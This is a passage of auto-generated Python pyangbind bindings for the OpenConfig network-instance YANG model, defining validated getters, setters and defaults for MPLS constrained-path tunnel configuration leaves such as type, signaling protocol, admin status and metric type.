"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(7),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(0),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"mpls",
"lsps",
"constrained-path",
"tunnels",
"tunnel",
"config",
]
def _get_name(self):
"""
Getter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
YANG Description: The tunnel name
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
YANG Description: The tunnel name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """name must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__name = t
if hasattr(self, "_set"):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
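# Usage sketch (illustrative, not part of the generated bindings): pyangbind
# wires these _get_/_set_/_unset_ methods to a property elsewhere in the
# class, so callers normally use attribute access. Assuming `tunnel` is an
# instantiated tunnel binding:
#
#   tunnel.config.name = "LSP-to-PE2"   # dispatches to _set_name(); the value
#                                       # is validated via YANGDynClass against
#                                       # the YANG string type
#   tunnel.config.name                  # dispatches to _get_name()
#   tunnel.config._unset_name()         # restores the leaf to an empty default
#
# An invalid value (wrong type) raises the ValueError built in _set_name(),
# carrying the error-string / defined-type / generated-type dict shown below.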
def _get_type(self):
"""
Getter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
YANG Description: Tunnel type, p2p or p2mp
"""
return self.__type
def _set_type(self, v, load=False):
"""
Setter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_type() directly.
YANG Description: Tunnel type, p2p or p2mp
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__type = t
if hasattr(self, "_set"):
self._set()
def _unset_type(self):
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_signaling_protocol(self):
"""
Getter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
YANG Description: Signaling protocol used to set up this tunnel
"""
return self.__signaling_protocol
def _set_signaling_protocol(self, v, load=False):
"""
Setter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_signaling_protocol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_signaling_protocol() directly.
YANG Description: Signaling protocol used to set up this tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """signaling_protocol must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="signaling-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__signaling_protocol = t
if hasattr(self, "_set"):
self._set()
def _unset_signaling_protocol(self):
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
YANG Description: optional text description for the tunnel
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: optional text description for the tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """description must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__description = t
if hasattr(self, "_set"):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_admin_status(self):
"""
Getter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
YANG Description: TE tunnel administrative state.
"""
return self.__admin_status
def _set_admin_status(self, v, load=False):
"""
Setter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_status() directly.
YANG Description: TE tunnel administrative state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_status must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:ADMIN_UP"), is_leaf=True, yang_name="admin-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__admin_status = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_status(self):
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
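# Note (illustrative): identityref leaves such as admin-status accept any of
# the prefixed spellings enumerated in restriction_arg above, e.g. "ADMIN_UP",
# "oc-mpls-types:ADMIN_UP", "oc-mplst:ADMIN_UP", or "oc-mpls-t:ADMIN_UP" --
# all resolve to the same identity from openconfig-mpls-types. When the leaf
# is unset, the YANG default "oc-mplst:ADMIN_UP" applies, so a freshly created
# tunnel is administratively up unless ADMIN_DOWN is configured explicitly.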
def _get_preference(self):
"""
Getter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
return self.__preference
def _set_preference(self, v, load=False):
"""
Setter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_preference is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_preference() directly.
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """preference must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['1..255']}), is_leaf=True, yang_name="preference", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__preference = t
if hasattr(self, "_set"):
self._set()
def _unset_preference(self):
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with identityref""",
